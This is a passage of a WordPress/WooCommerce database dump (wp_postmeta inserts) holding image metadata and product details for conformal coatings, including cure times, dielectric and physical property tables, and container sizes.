INSERT INTO `wp_postmeta` VALUES (6330, 726, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:34:"2016/08/shutterstock_105938183.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_105938183-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_105938183-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_105938183-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_105938183-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_105938183-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_105938183-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_105938183-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_105938183-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6331, 696, '_thumbnail_id', '725'); 
INSERT INTO `wp_postmeta` VALUES (6332, 697, '_thumbnail_id', '726'); 
INSERT INTO `wp_postmeta` VALUES (6333, 727, '_wp_attached_file', '2016/08/shutterstock_93735121.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6334, 727, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2792;s:6:"height";i:1960;s:4:"file";s:33:"2016/08/shutterstock_93735121.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_93735121-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_93735121-800x562.jpg";s:5:"width";i:800;s:6:"height";i:562;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_93735121-768x539.jpg";s:5:"width";i:768;s:6:"height";i:539;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_93735121-1600x1123.jpg";s:5:"width";i:1600;s:6:"height";i:1123;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_93735121-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_93735121-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_93735121-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_93735121-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:67;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6335, 728, '_wp_attached_file', '2016/08/shutterstock_98038829.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6336, 728, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4200;s:6:"height";i:2610;s:4:"file";s:33:"2016/08/shutterstock_98038829.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_98038829-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_98038829-800x497.jpg";s:5:"width";i:800;s:6:"height";i:497;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_98038829-768x477.jpg";s:5:"width";i:768;s:6:"height";i:477;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"shutterstock_98038829-1600x994.jpg";s:5:"width";i:1600;s:6:"height";i:994;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_98038829-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_98038829-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_98038829-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_98038829-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6337, 729, '_wp_attached_file', '2016/08/shutterstock_102056233.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6338, 729, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4140;s:6:"height";i:2610;s:4:"file";s:34:"2016/08/shutterstock_102056233.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_102056233-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_102056233-800x504.jpg";s:5:"width";i:800;s:6:"height";i:504;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_102056233-768x484.jpg";s:5:"width";i:768;s:6:"height";i:484;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_102056233-1600x1009.jpg";s:5:"width";i:1600;s:6:"height";i:1009;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_102056233-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_102056233-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_102056233-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_102056233-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6339, 730, '_wp_attached_file', '2016/08/shutterstock_326782289.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6340, 730, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5616;s:6:"height";i:3744;s:4:"file";s:34:"2016/08/shutterstock_326782289.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_326782289-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_326782289-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_326782289-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_326782289-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_326782289-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_326782289-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_326782289-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_326782289-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6342, 620, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (6343, 659, '_thumbnail_id', '729'); 
INSERT INTO `wp_postmeta` VALUES (6344, 671, '_thumbnail_id', '728'); 
INSERT INTO `wp_postmeta` VALUES (6345, 707, '_thumbnail_id', '730'); 
INSERT INTO `wp_postmeta` VALUES (6346, 707, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (6347, 707, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (6348, 731, '_wp_attached_file', '2016/08/shutterstock_373999234.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6349, 731, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3090;s:6:"height";i:2110;s:4:"file";s:34:"2016/08/shutterstock_373999234.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_373999234-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_373999234-800x546.jpg";s:5:"width";i:800;s:6:"height";i:546;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_373999234-768x524.jpg";s:5:"width";i:768;s:6:"height";i:524;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_373999234-1600x1093.jpg";s:5:"width";i:1600;s:6:"height";i:1093;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_373999234-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_373999234-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_373999234-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_373999234-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6350, 708, '_thumbnail_id', '731'); 
INSERT INTO `wp_postmeta` VALUES (6351, 708, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (6352, 708, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (6353, 620, '716_default_editor', 'Silicone Conformal Coating dries in approximately one hour and completely cures within 72 hours after coating.  A good cure for a working environment requires 24 hours at 77oF/25oC and 50% relative humidity.  Higher humidity and temperature will result in a faster cure.  The coating can be cured in 30 minutes at 168oF/75oC or in 15 minutes at 302oF/150oC in an air circulating oven.'); 
INSERT INTO `wp_postmeta` VALUES (6354, 620, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (6355, 697, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (6356, 621, '716_default_editor', 'The recommended cure time is 45 minutes at 167°F/75°C.  The alternate cure is 24 hours at 77°F/25°C. Acrylic coating will be tack free in one hour, semi-hard in four hours, and fully cured in 24 hours.  Deaeration is not recommended.'); 
INSERT INTO `wp_postmeta` VALUES (6357, 621, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (6358, 671, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (6359, 637, '716_default_editor', 'The recommended cure time is 45 minutes at 167°F/75°C.  The alternate cure is 24 hours at 77°F/25°C. Acrylic coating will be tack free in one hour, semi-hard in four hours, and fully cured in 24 hours.  Deaeration is not recommended.'); 
INSERT INTO `wp_postmeta` VALUES (6360, 637, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (6361, 732, '_edit_lock', '1493382283:3'); 
INSERT INTO `wp_postmeta` VALUES (6362, 732, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (6363, 732, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (6364, 732, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (6365, 732, '312_default_editor', '<strong>Cure Electrical Properties</strong>\r\n<table width="326">\r\n<tbody>\r\n<tr>\r\n<td width="244">Dielectric Strength (volts/mil)</td>\r\n<td width="82">400</td>\r\n</tr>\r\n<tr>\r\n<td>Dielectric Constant (10Hz )</td>\r\n<td>2.74</td>\r\n</tr>\r\n<tr>\r\n<td>Dissipation Factor 10^5 Hz</td>\r\n<td>&lt;0.0002</td>\r\n</tr>\r\n<tr>\r\n<td>Volume Resistivity (ohm/cm)</td>\r\n<td>5x10^13</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Cure Physical Properties</strong>\r\n<table width="326">\r\n<tbody>\r\n<tr>\r\n<td width="244">Operating Temperature</td>\r\n<td width="82">94 V-00</td>\r\n</tr>\r\n<tr>\r\n<td>UL Flammability Classification</td>\r\n<td>240</td>\r\n</tr>\r\n<tr>\r\n<td>Tensile Strength (psi) @ 77F/25C</td>\r\n<td>74</td>\r\n</tr>\r\n<tr>\r\n<td>Elongation (%) @ 77F/25C</td>\r\n<td>80</td>\r\n</tr>\r\n<tr>\r\n<td>Durometer Hardness, Shore A, Points</td>\r\n<td>2.1 x 10^-4</td>\r\n</tr>\r\n<tr>\r\n<td>Coefficient of Thermal Expansion</td>\r\n<td>2.0 x 10^-4</td>\r\n</tr>\r\n<tr>\r\n<td>Water Absorption</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>100 hrs. @ 77oF/25oC</td>\r\n<td>0.11%</td>\r\n</tr>\r\n<tr>\r\n<td>100 hrs. @ 221F/105C &amp; 98%RH</td>\r\n<td>0.33%</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (6366, 732, '716_default_editor', 'Silicone Conformal Coating dries in approximately one hour and completely cures within 72 hours after coating.  A good cure for a working environment requires 24 hours at 77F/25C and 50% relative humidity.  Higher humidity and temperature will result in a faster cure.  The coating can be cured in 30 minutes at 168F/75C or in 15 minutes at 302F/150C in an air circulating oven'); 
INSERT INTO `wp_postmeta` VALUES (6367, 732, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (6368, 732, '317_default_editor', 'Quart, Gallon, 5 Gallon. 55 Gallon drum'); 
INSERT INTO `wp_postmeta` VALUES (6369, 732, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (6370, 732, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (6371, 732, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6372, 732, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6373, 732, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (6374, 732, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6375, 732, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (6376, 732, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (6377, 732, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (6378, 732, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (6379, 732, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (6380, 732, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6381, 732, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6382, 732, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6383, 732, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (6384, 732, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (6385, 732, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6386, 732, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (6387, 732, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6388, 732, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6389, 732, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (6390, 732, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6391, 732, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6392, 732, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (6393, 732, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6394, 732, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6395, 732, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (6396, 732, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (6397, 732, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (6398, 732, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (6399, 733, '_edit_lock', '1498062133:3'); 
INSERT INTO `wp_postmeta` VALUES (6400, 733, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (6401, 733, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (6402, 733, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (6403, 733, '312_default_editor', '<strong>Electrical Properties</strong>\r\n<table width="378">\r\n<tbody>\r\n<tr>\r\n<td width="242">Dielectric Strength, volts/mil</td>\r\n<td width="136">2000</td>\r\n</tr>\r\n<tr>\r\n<td>Dielectric Constant @ 10^5 Hz</td>\r\n<td>3.42</td>\r\n</tr>\r\n<tr>\r\n<td>Dissipation Factor @ 10^5 Hz</td>\r\n<td>0.031</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<strong>Physical Properties</strong>\r\n<table style="height: 205px;" width="441">\r\n<tbody>\r\n<tr>\r\n<td width="242">Glass Transition Temperature</td>\r\n<td width="136">168F/76C</td>\r\n</tr>\r\n<tr>\r\n<td>Tukon Hardness, Knoop No.</td>\r\n<td>13</td>\r\n</tr>\r\n<tr>\r\n<td>Acid Number</td>\r\n<td>5</td>\r\n</tr>\r\n<tr>\r\n<td>Tensile Strength (23°C/73°F @ 50% RH)</td>\r\n<td>1,600 psi</td>\r\n</tr>\r\n<tr>\r\n<td>Elongation at Break (23°C/73°F @ 50% RH)</td>\r\n<td>0.50%</td>\r\n</tr>\r\n<tr>\r\n<td>Operating Temperature</td>\r\n<td>23F/-5C to 168F/76C</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (6404, 733, '716_default_editor', 'Dries in 10 minutes and is fully cured in 24 hours.  At a 2 mil. thickness, coverage is approximately 7.6 square feet per 1- aerosol can'); 
INSERT INTO `wp_postmeta` VALUES (6405, 733, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (6406, 733, '317_default_editor', '14 oz Aerosol'); 
INSERT INTO `wp_postmeta` VALUES (6407, 733, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (6408, 733, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (6409, 733, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6410, 733, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6411, 733, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (6412, 733, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6413, 733, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (6414, 733, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (6415, 733, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (6416, 733, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (6417, 733, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (6418, 733, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6419, 733, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6420, 733, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6421, 733, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (6422, 733, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (6423, 733, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6424, 733, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (6425, 733, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6426, 733, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6427, 733, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (6428, 733, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6429, 733, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6430, 733, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (6431, 733, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6432, 733, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6433, 733, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (6434, 733, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (6435, 733, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (6436, 734, '_edit_lock', '1476204705:3'); 
INSERT INTO `wp_postmeta` VALUES (6437, 734, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (6438, 734, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (6439, 734, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (6440, 734, '312_default_editor', '<strong>Electrical Properties</strong>\r\n<table width="378">\r\n<tbody>\r\n<tr>\r\n<td width="242">Dielectric Strength, volts/mil</td>\r\n<td width="136">2000</td>\r\n</tr>\r\n<tr>\r\n<td>Dielectric Constant @ 10^5 Hz</td>\r\n<td>3.42</td>\r\n</tr>\r\n<tr>\r\n<td>Dissipation Factor @ 10^5 Hz</td>\r\n<td>0.031</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<strong>Physical Properties</strong>\r\n<table width="441">\r\n<tbody>\r\n<tr>\r\n<td width="242">Glass Transition Temperature</td>\r\n<td width="136">168F/76C</td>\r\n</tr>\r\n<tr>\r\n<td>Tukon Hardness, Knoop No.</td>\r\n<td>13</td>\r\n</tr>\r\n<tr>\r\n<td>Acid Number</td>\r\n<td>5</td>\r\n</tr>\r\n<tr>\r\n<td>Tensile Strength (23°C/73°F @ 50% RH)</td>\r\n<td>1,600 psi</td>\r\n</tr>\r\n<tr>\r\n<td>Elongation at Break (23°C/73°F @ 50% RH)</td>\r\n<td>0.50%</td>\r\n</tr>\r\n<tr>\r\n<td>Operating Temperature</td>\r\n<td>23F/-5C to 168F/76C</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (6441, 734, '716_default_editor', 'Dries in 10 minutes and is fully cured in 24 hours.  At a 2 mil. thickness, coverage is approximately 95 square feet per gallon.'); 
INSERT INTO `wp_postmeta` VALUES (6442, 734, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (6443, 734, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon Drum'); 
INSERT INTO `wp_postmeta` VALUES (6444, 734, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (6445, 734, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (6446, 734, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6447, 734, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6448, 734, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (6449, 734, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6450, 734, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (6451, 734, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (6452, 734, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (6453, 734, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (6454, 734, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (6455, 734, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6456, 734, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6457, 734, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6458, 734, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (6459, 734, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (6460, 734, '_price', ''); 
